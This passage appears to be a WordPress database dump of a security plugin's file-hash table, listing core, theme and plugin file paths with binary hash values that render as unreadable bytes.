�~��cҢ��','wp-includes/wp-includes/blocks.php',0,'�[\"����#�\'޻','�[\"����#�\'޻','j��$��)�~ŗH�x���}J�1z�м�v��','',0,'?'),('�w:k@D�i�WQ�','wp-content/plugins/wordfence/lib/wfModuleController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��oI�Ʒk���b','7.ݰ̿���U���L>�\"�TM5�]��>�','',0,'?'),('�&��ez��Qmk\0�&','wp-includes/wp-includes/Requests/Transport/cURL.php',0,'��87a`CZ��','��87a`CZ��','hI���� x<�������%��ji�����$','',0,'?'),('����$cB�2r�?I�','wp-includes/wp-includes/js/tinymce/utils/validate.js',0,'CL�1?o+;���{Y�','CL�1?o+;���{Y�','k�H��;�\0�kC�s�	\'K�#45+eE|���0','',0,'?'),('���\Z�V���տ','wp-content/plugins/wp-cerber/cerber-maintenance.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�69SH\nƻ��/��(�','�(c%��vW�S�xEuς><���¶�Ȯ[� ','',0,'?'),('�T���!ة7�l��<','wp-includes/js/codemirror/htmlhint-kses.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��k[�#cLf{','�N��&�V\Z�A��/��R#~բ���_J*�Ї','',0,'?'),('�_���jSX�2�QQ=','wp-includes/ms-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�),l�\"��?�V�?%','���#~���&�S@�]�ED}L*�#5+\r�','',0,'?'),('�`~|D%EH�wO����','wp-includes/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Ǭ��� ���','�7�.{��=�5�A�~�\r~.A(0Z��Q�2�','',0,'?'),('�iHPC�|5U\0`�	r�H','wp-includes/wp-includes/js/dist/deprecated.js',0,'�B�v\"}	�H���}��T','�B�v\"}	�H���}��T','5\r�_��I��h�MJuk��Q�ͣ�չ���zn','',0,'?'),('�|m���@8�S�>=��','wp-includes/wp-includes/blocks/code/block.json',0,' �2z`������A�%�',' �2z`������A�%�','W��@\r�8�Q��u�\0H� �WhR��ے0c���','',0,'?'),('ÂuJ�M�/� w�y','wp-includes/sodium_compat/lib/php72compat_const.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p{��[��˔�	','�9�o���G�f�pmeG�#`�:Q�{`�','',0,'?'),('ä��]0�`���AS:D','wp-includes/js/dist/blob.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&F�8ĺa���!��','�i�fwU,D9�a�S\\S���n0˸w��1�','',0,'?'),('ç�?��<}��`C','wp-includes/wp-includes/js/dist/keycodes.js',0,'!a����	��5/ �','!a����	��5/ �','8*�Zu%V��,�3Yb���k־�&) ���E','',0,'?'),('èuT��^jP��6�','wp-includes/wp-includes/images/smilies/icon_confused.gif',0,'/#	�Ӣww$x꾓Y','/#	�Ӣww$x꾓Y','U0�\\L�X��fXƦ�G\0�T���$a�5U�B�','',0,'?'),('éR�%��ӚZ#+�\"','wp-includes/wp-includes/js/dist/media-utils.js',0,'��3)PvLiJO�|��','��3)PvLiJO�|��','�c��BD����ҕ���2+��k�`1<��*�w�˕','',0,'?'),('ü�{V+�ϷH�֖','wp-includes/wp-includes/class-wp-text-diff-renderer-table.php',0,'�-�����g0HFuI�','�-�����g0HFuI�','�_h+�U��H�i��_��e�	w����6��','',0,'?'),('ý��P��7&ݣ`�)','wp-includes/sodium_compat/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Υ\ZBab�_ƺ�01Q','\n����譂:|���D�g�����DU�\r�=','',0,'?'),('��tnR�ؔ����%^�','wp-admin/images/align-right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B���Oe#�l@:P+\"v','�ɳ���C��?�=���&��UyZ�31��!<c','',0,'?'),('���5�V\"�$$�_��','wp-admin/includes/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=b��)�z��(��','��\\���.�[-�C��-�E>B᧶9�����','',0,'?'),('��%�x#B�9ܳ�?�y�','wp-includes/wp-includes/images/smilies/icon_cry.gif',0,'�+`Ůd�W]�����h','�+`Ůd�W]�����h','[�<�q�wf�)�rZ�(���=#;ans���w9','',0,'?'),('��4�l!�r��؄���','wp-includes/class-wp-block-type-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rR�M8��u<�V�l��','�\Z�7�Q\0����O�C�\r.�D�\0n*���','',0,'?'),('��iY����\0\nR)��','wp-includes/post-thumbnail-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d��V��cꘄ','G�%*�J	���$��o=�@��k����Jl�','',0,'?'),('��u�X�ݼ#�-���','wp-includes/class-wp-http-ixr-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����2���5K','�BVrAC\n�a�+���(�;%�FdC��TD�#��','',0,'?'),('�ň��/���tNҊb','wp-content/plugins/wordfence/css/wfselect2.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c����3,B�V���','��ڑ�t4U��\"�;�t�7�\Z�Jy�rb@','',0,'?'),('�G���\Z0���|��','wp-includes/wp-includes/class-wp-block-type.php',0,'�<Aj�Q�~$���~��','�<Aj�Q�~$���~��','��\\)�dw(?o���1�i�n�@�~KU6���Z','',0,'?'),('�W��	Ln<�RUc��>','wp-includes/wp-includes/SimplePie/Locator.php',0,'g�3�y�%14���','g�3�y�%14���','<���ms�4�3p-I�/�8\'J�� }.�','',0,'?'),('�`�,}��D��@','wp-includes/class-wp-recovery-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �oxц��<N��','�4>���\r�	j����s�dqm��H��l�7�~��','',0,'?'),('�y���x�Q3�p3�','wp-includes/wp-includes/js/dist/wordcount.min.js',0,'Ǣ�6Ӯ����H�pL','Ǣ�6Ӯ����H�pL','��A+l:#I�-A��5�J�iQ��ڙRW�w\0r�','',0,'?'),('Ĉ^A��+l���o�d��','wp-includes/js/tinymce/skins/wordpress/images/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7~!���\0����\"w','�g��z���.g�V�:��[����Й�H)Ȟ�','',0,'?'),('ĔԼ���pP�Z	H��','wp-includes/images/smilies/icon_cry.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+`Ůd�W]�����h','[�<�q�wf�)�rZ�(���=#;ans���w9','',0,'?'),('ĕ�B����ls��e�','wp-includes/wp-includes/SimplePie/Enclosure.php',0,'��(2ROf;Vkj�','��(2ROf;Vkj�','�������`�.۾H�,�x1���8q?�L�}]','',0,'?'),('ijJ�\n`|�5,HT��','wp-admin/includes/admin-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��1T�(Nȩ\Z','�7��NZ|�0�N��HQ��r�\nR��o�C�f','',0,'?'),('Ķ�Ɩ�o���èf{U','wp-includes/js/jquery/ui/effect-highlight.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n+)�����I�L\r�','qp��G%�S���V���9|�����@S�Xn','',0,'?'),('���ؑ\\���n`�͜','wp-content/themes/sg-window/inc/widget-project-naigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c(��}���$l����','͙c	@9Z`�v�7�v��\\ز���4��','',0,'?'),('�Ѻɩ��uy����}','wp-includes/sodium_compat/src/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���b5lJ�#���v','c=0�-#�-T�S�X�&��4����\0�K8\r�','',0,'?'),('��ʙ\0}��甠K��.�','wp-includes/js/jquery/jquery.color.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rq�*X�gq�O�(͈','�x�2���<���k���Qݯ�����{��','',0,'?'),('��{A��mm��*�K','wp-includes/nav-menu-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JI1E%g䅝�?�&�','AS%�³�[�|ZJf�RH3#Bl�K��zH','',0,'?'),('�uy(e_�X�\0�6','wp-includes/wp-includes/js/media-views.min.js',0,'�J虝���\n�G{5�','�J虝���\n�G{5�','�7�ϝ���P9n)%�-�i�Qԭv���kJ���','',0,'?'),('�D���C����F}��','wp-includes/Requests/Exception/HTTP/418.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J!�����[��4��','4 �6鎬��M&�$!�2d<��\\	|\\�?g�\n','',0,'?'),('�OYD�;�/\n�~��','wp-includes/wp-includes/Requests/Exception/HTTP/406.php',0,'K��l�h�r��9�\"\0�','K��l�h�r��9�\"\0�',',aY��}PR6���`�)K�f�ism ���','',0,'?'),('�_�n�����p���aV','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>*L�1�˵�\"k%F�+','Z��i�M�f�U�v�i-�})��f�\"��Mnd?X','',0,'?'),('�`#��G�b�C��֊�','wp-includes/js/swfupload/handlers.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��ڙK�~q	����c=','�T򌿑�d�T�y~#��jI\"�+�+3�ɉ','',0,'?'),('�~s�5խ�?([�Ҹ�','wp-includes/wp-includes/class.wp-scripts.php',0,'��s�zrU[\nK��z��','��s�zrU[\nK��z��','s�d����� J�WL�+<�I���S4y$)T@','',0,'?'),('łj�Dߋ�.�˖D��','wp-admin/css/forms.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3B2�&*)��^*��3','�ĤѮp\\��;x�\'���H�42�N��_�Ei','',0,'?'),('Ŋ��6���@�L(`��','wp-content/plugins/wordfence/views/scanner/site-cleaning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �W�	r��>�Vݟ�','p�<L�>�������\r�~29~�^��ɋF�','',0,'?'),('ŕ�y�n�\\��zL�ʨ','wp-includes/wp-includes/class-wp-http-curl.php',0,'�S�`3F�O�,;N#���','�S�`3F�O�,;N#���','��@�� ����T��(�\nD�ڠ��Y��	�]�2','',0,'?'),('że�����E@}-�','wp-content/plugins/wp-cerber/assets/flags/ss.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('��-�p�lE���k�/�','wp-includes/js/jquery/jquery.hotkeys.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S!}EU�\\b�g�h��=','\ZJ��]�x ծT���c�0n�9  +V�k�','',0,'?'),('��A#����Uu�O���','wp-content/plugins/wp-cerber/assets/flags/sk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I�q!-�\"�jU]P','��!$�2�E@��e�K���z\\�x�<GF�	','',0,'?'),('�v�T!)��aH�','wp-content/plugins/wp-cerber/assets/flags/mq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���zs�׳Wh���','����J���U2V\\��h�Ѧ�Z�t/���Q','',0,'?'),('�ZTD�\r�[��FcLL�','wp-includes/blocks/gallery/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������9��Qv��','��PgcZn1q��b�-޼���x�]ME��ܻ���','',0,'?'),('�#6��n!����S','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-url.js',0,'�>d�KP\'IC��3��8','�>d�KP\'IC��3��8','�k��z��:�_sDp�xe%J�	���ST�_','',0,'?'),('����c�$Jm-�8�','wp-includes/wp-includes/js/dist/keyboard-shortcuts.js',0,'w�\ZH����%3kGUE','w�\ZH����%3kGUE','\"�����8��	�鎸\'��o83�J���w���','',0,'?'),('�Rx�M�J�=����','wp-includes/wp-includes/css/dist/editor/style-rtl.min.css',0,'_O7b/��T���m�','_O7b/��T���m�','_w��^���p�{�,ǣ��{}�:�\0���2�','',0,'?'),('�	��#A�\n#b#��=','wp-includes/js/tinymce/themes/inlite/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z=\ro<3��E���','�\"�;l��\0s\'�lB�3q�6)�8�\n@D����','',0,'?'),('��p�1	�?��J@�','wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ǧn3Q�2�G�','�d��\"fݎ���6em�`�z����P<KO�','',0,'?'),('�+���g���q6�^\0�','wp-admin/images/wheel.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E0� q0m��\ZY%V�X�','(]�:=d�qۅ�O{9�€Ԁ�v��Ș~����','',0,'?'),('�@��:<�o|J-e�','wp-content/plugins/wordfence/images/wf-error-badge.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EQt��s	�Mz�y���','��殙F��`�a�݀�k���mE�Q��+~��','',0,'?'),('ƅ����|_�i/y��	','wp-includes/js/tinymce/plugins/media/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�\'1�Z����f ','\n�>����EQ�i�漺��k�}î�Dz������','',0,'?'),('Ɣ�}r��ףC9�L� \n','wp-content/themes/sg-window/inc/js/slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_	��w��U� 	D�','�r�Jr��u~�D�WK��^�@\'��5s�%','',0,'?'),('Ƭ+\Z���I�d^i <\0','wp-includes/js/jquery/suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':$tV�E�ʿ���','r�,K�pŗrq^b�\\��=rZ�]��6�+','',0,'?'),('Ƭ��SX���Z���3�','wp-includes/js/dist/plugins.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hh�miJ=�9�?Y�\n','���\\��ç�W2���~:�y{�=�$fh��','',0,'?'),('���yw�-p��`�)','wp-content/plugins/wp-cerber/assets/flags/cd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��E�\0{+k�`֚o','bf&<�9�\nTĔ��n��\Z~�\Z,����!��','',0,'?'),('�몳@� �=��y`','wp-content/plugins/wordfence/views/options/options-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�0�\"����#�','��֩y\n�	��ij����X�H�-<f	��c�','',0,'?'),('�͌%+�e�@uQ(�','wp-includes/js/dist/editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ՕU��]��\'�r\r�\'�','��V�z�x�K�fB_�KW��Vt�\0[�)m���','',0,'?'),('����͊pzn0&t�C','wp-includes/wp-includes/js/jquery/ui/dialog.js',0,'�屬�U��u���z̜','�屬�U��u���z̜','H7�pn�\Z��8����__E<��\r��','',0,'?'),('ǂ-i)�.�\\���z�^a','wp-includes/Text/Diff/Engine/shell.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�����?��z&','�=5��:Pu\'pM�N[�9^�m>z@','',0,'?'),('Dž�9��9:���\Z�','wp-includes/cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��V��O��yDv� !','{�d���<>wb�S�q����B������','',0,'?'),('Lj�Q&*o(��a#IX','wp-includes/wp-includes/Requests/Exception/HTTP/409.php',0,'�Z�i�~*=����','�Z�i�~*=����','���_M��8U���.pF����w�:E`�MB��','',0,'?'),('ǑCvd��ė󍩆�','wp-includes/wp-includes/ID3/readme.txt',0,'ݣ��z�eѧѥk58�','ݣ��z�eѧѥk58�','l��r����p4��FBܢ7\"Z:�W�v���','',0,'?'),('ǝ�^�x�JB\Z�3-�6','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��5]{\"���V�','�C�Jr~W�OY�*[�:[j)���G�Є�e�','',0,'?'),('ǟ��H0�Q�Y�>','wp-includes/wp-includes/class-walker-nav-menu.php',0,'�S��|8���~Rx�4','�S��|8���~Rx�4','�P�6��^��9�hQ=�Ʉ�����A��X��','',0,'?'),('Ǥ>z�Ԅ��!J]>','wp-includes/css/wp-auth-check-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�P��KN��zj��K','V<e�b��(�k��I��2�\ZÜu�/#4Ɇmz','',0,'?'),('ǫ�=��m�/���^','wp-admin/includes/schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���PI ��k�����	','&�v��x¡�gu�SV���ҏ����r�','',0,'?'),('dz\\��_L-Y�Ō%$','wp-includes/ID3/module.audio.dts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�llA�2���̋�','\Z�aH���r���%A���6$`Hu�T�6y�4�','',0,'?'),('�ڪ�&����e��pR��','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/H.php',0,'x} ��pc��K�O�','x} ��pc��K�O�','(H>�0�}���8:e�)T��N�/�z�','',0,'?'),('��w��y�*�X�O\nG��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�Vl~�m[%Wt','P�q\0������V{|�0m\0;���2�f@U�','',0,'?'),('��}��=kq�δ','wp-content/themes/sg-window/img/icons/yahoo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���g+�d e���v','���&+B��V�9\'�!�hh���g�9','',0,'?'),('��}�C�wX�TC��','wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m]�a���\\$��','Ǘ�h?���S���)�:���i@h.��X�g��','',0,'?'),('�\Z{g�?�3gڢ\Z�','wp-admin/images/icons32-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�*�����g����','�#!$��@�0g�.�;i3%!�cHP���=','',0,'?'),('��fp��\0!�tDK','wp-admin/js/code-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�\'߽	�%���','��-�Bd/�`��\\V�x6Y*��-$����W','',0,'?'),('�\"u@��T��S��5�','wp-includes/images/smilies/icon_idea.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<]�W3tށ�','�{�2^4S����Tl���I�J�Q��\"','',0,'?'),('�7�\0��tt��.','wp-content/plugins/wordfence/views/dashboard/status-renewing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','an�$�6�����\"','�tɢ�����C-?�\'(�uꢦA�T-1ba��:','',0,'?'),('�8����R�6>G\"���','wp-includes/js/dist/element.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����;�o/f���','+��o�Ӭ8|�(9-�5����Xe�`H','',0,'?'),('�;����N�Q>���','wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��vwX\n_Yg!��','r;�\Z� G�����[i$�)���v�]j7�im#','',0,'?'),('�H	���\n>��a�~','wp-includes/wp-includes/blocks/latest-posts/block.json',0,'�5P�m��)-\\\r�M�','�5P�m��)-\\\r�M�','/B�Oq<Rv\0ѓv�eys��u�\0)b�\rk{�6O','',0,'?'),('�Y$\'����o���','wp-includes/css/wp-auth-check-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���jv�sZ��ܻ&h�','F�V=&G\"�r��\rF�p��\nJ�ݣ�=՟3�','',0,'?'),('�u��C~7\n���W�e�','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�we�J�����@�?��','�W�ľ�6���7#`_�g�;���,9�.��=','',0,'?'),('ȁ��#/�\0��6','wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4��ӹu�;P�','�aD�,�ǭ��+v�Fe\"+���!���1t','',0,'?'),('ȍP�� �3����\n��','wp-includes/class-wp-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���(���H�g1k!~','Գh(��m7B��.�oǏu��ʼ%a��1ʾ�','',0,'?'),('ȑ\\�#\"�*����*!2','wp-includes/wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php',0,'����O�����81','����O�����81','���v$�͏���,��5�6X�~Xʧ��ℐ���','',0,'?'),('Ȣ�@Ø�`U�ѣ /�','wp-content/themes/sg-window/img/icons/flickr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��?߽�I5X\0��','�^	m�~�=`!��pb��Nd�Lox�s�Otx�','',0,'?'),('ȣ�gӰ�DZCs��','wp-content/plugins/wp-cerber/assets/flags/cs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qȥ�`�����','���3�#�xUN�^�[ ^�1�a�֌�GX9PP','',0,'?'),('ȩ��u��s�\\r�e�','wp-includes/wp-includes/Text/Diff/Renderer.php',0,'�� �C0�Y7O�@�GS','�� �C0�Y7O�@�GS','EWj�+��\\��=����}.��1\r��|','',0,'?'),('ȿ�-��`�u���o��','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�m;S��V#��m�I','�R9F��������47i}�ʧ��C^�%','',0,'?'),('�ʵ�*\'��]���=��','wp-includes/wp-includes/Requests/Cookie.php',0,'�]��4�G��FdW(�','�]��4�G��FdW(�','1׋��0*�E�3:/��2p��կ�\0K2^�(','',0,'?'),('�����~\r\ZK4(#��','wp-admin/user/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(팋�#��A���;�','�u�A���+I/�㊓\0�n�N�1G8�\ZD-�','',0,'?'),('�!�`�L�i\0Ը�u','wp-content/plugins/wp-cerber/assets/flags/mf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�5�iD�hI�6�;','wp-includes/SimplePie/Cache/Memcached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n�\'Xlab��4`','?O�d6�C���u���>Jr��h�t����e���','',0,'?'),('�:O��-�Ax�P�h��L','wp-content/themes/sg-window/taxonomy-jetpack-portfolio-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' B�)>|�o.P��','����<\n�@ô�H�+ީ�eI�-\"��mb*!y','',0,'?'),('�A7�\'�C#�w�S�s�','wp-admin/css/about.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x ��\0�\Z�*m7v%',']jH��#���?�����j6MI�aҰ�(e��','',0,'?'),('�_�xx����,����M','wp-includes/wp-includes/random_compat/random_bytes_libsodium_legacy.php',0,'�[q�7d�v���z�','�[q�7d�v���z�','\'֪��*	[\0EE*J�r�V�s�����c�?','',0,'?'),('�lX�w��B�*X�W�','wp-content/plugins/wordfence/images/sort_asc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oɧ��*�X���9e','�v�\Z�|5.YX ������Z�鹁Ź','',0,'?'),('�y�8��c4�i��','wp-includes/wp-includes/js/jquery/ui/checkboxradio.js',0,'�\"VSdF\n��k���:','�\"VSdF\n��k���:','$Lq���\'��i�>WuY\\���{�k���\r�{','',0,'?'),('Ɇ8���pŻѵV�','wp-content/plugins/wordfence/lib/wfActivityReport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pnӑ,vP*�`4i','��)ed}&�C�\"_ڸ�l<z�U�,?b:��@u','',0,'?'),('ɏ�u��&\\��Z','wp-includes/wp-includes/js/dist/server-side-render.js',0,'1�eQǔ;-P7�苛�d','1�eQǔ;-P7�苛�d','rP���^�ç\Zx~�;�����\"�x]43s','',0,'?'),('ɡʧ~����.)k','wp-admin/includes/class-custom-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_%��5�ߔrg[\Z�','��3�4�n�8�@�}���!��pc�8�\0�̴','',0,'?'),('ɣ/e��;���v�','wp-includes/wp-includes/class-wp-application-passwords.php',0,'�;�Q����cW�M7A','�;�Q����cW�M7A','��x���� �?��L�\Z�l�C�\"���Ǵ��','',0,'?'),('ɮ�Φhѹ���\"��4','wp-content/themes/shootingstar/js/infinitescroll.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ճ ��ۉJ���ͷ�','64���l&�$��1D],:{{�f��v_��n�Q','',0,'?'),('�����2D�i�e�','wp-admin/css/l10n.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ĸ�P)�|��q�r���','wppS���\"�D�.��o�MO�m�O�\'b�aNj0','',0,'?'),('���=)�`K�\'��xXe','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php',0,'�u��u��tu�+]�a','�u��u��tu�+]�a','�\n�1�IJ��A��P3����C\0{K7QO��f�','',0,'?'),('�ͤ� �T���-�','wp-content/plugins/wp-cerber/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��=v����]���V','k�����~	��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�(�q�4P�}�5Oz�k','wp-admin/js/inline-edit-tax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ƶ���s�[��\"�','�]:\r+�����ʩ\'X�bҸX�����LU�','',0,'?'),('�R���ш�޿�0','wp-admin/css/themes.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L\0���M���\"�\\\\�','9\\�P�;P�;p�%/���?����]z]C�ǐ��','',0,'?'),('�g7,u,�<I���ͥ�','wp-includes/wp-includes/css/dist/block-directory/style-rtl.css',0,'��ˆ�gJ��^<','��ˆ�gJ��^<','���\ZybF���v��J�}�z��Lj��	(','',0,'?'),('�hFM<@`%q-��','wp-admin/includes/class-wp-filesystem-direct.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�,k�=G�c�x�','C������	�9�1�@���*C���Z','',0,'?'),('�r��{�\Zk��\"��k','wp-admin/css/site-health-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�9��yu�S�,�,�k','�	�m���������BFX&I�[s��','',0,'?'),('�xjP����!c�x','wp-admin/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�*���#��_��ҳZ�','�����f��uG#����\'��_ً�:�F�A','',0,'?'),('ʂ[	&�?p�bD','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui-timepicker-addon.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A��MA�@����|�','u��\Z�Ӛ1!�b�� \"�0SBȓ>�rEk�','',0,'?'),('���W�>�ҟ����[','wp-includes/Requests/Exception/HTTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h���Rlr��','o�E²tQQbo\n����r�Qq��\"�/����','',0,'?'),('�܆R(�\'2Whp���G','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ҏH��C�5̨[\0��','�X��f:�M�t�˃#��sD�4(�NG�F�','',0,'?'),('��	b���8�[����y','wp-includes/js/wp-emoji-release.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d͢7@$��g�;','F\r�R7��s\"YX^�ȹ�$�y�ss[','',0,'?'),('�㱛��� V9�{��b','wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�+���l�@�h�','3�i]m���&�	��s֯�I��g�e�ok��/M�','',0,'?'),('��TF�����B��e�1','wp-includes/wp-includes/block-patterns/quote.php',0,'c�:�v,^8^����\"�}','c�:�v,^8^����\"�}','����@��]y�%U?�vw�Xl�^�{q�','',0,'?'),('��O忯uR��c�[j','wp-includes/sodium_compat/namespaced/Core/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[cl�r�u�	�Сu^','6p��\'`�+*[AG�4�����^6Ŋ��%�C','',0,'?'),('�\0w��_E��d����q','wp-includes/wp-includes/js/wp-embed-template.min.js',0,'x)�tM�`WXx>�5�\\�','x)�tM�`WXx>�5�\\�','�b.�Ļ�@ߑϐ�E��c\Z1��ŀX�Z\n�8/�','',0,'?'),('�!��#��I|���F�','wp-includes/js/tinymce/plugins/directionality/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�\"�X	& )��=ʀ$','�&�[�@��5��(��cv��L��YI6�B;)-','',0,'?'),('�(�fbܜ�}W��F�','wp-includes/wp-includes/rest-api/search/class-wp-rest-post-search-handler.php',0,'�}*�yY��ը�F�','�}*�yY��ը�F�','1��SD��v�jk3�\0�G�<�\'|��!���','',0,'?'),('�5V�x�,$�>7d�k�','wp-includes/sodium_compat/namespaced/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڸb��9����M','�F�/\'���M%�9�}@��fW�>��S*�m','',0,'?'),('�6�<��C�﮿�V:(r','wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�be& 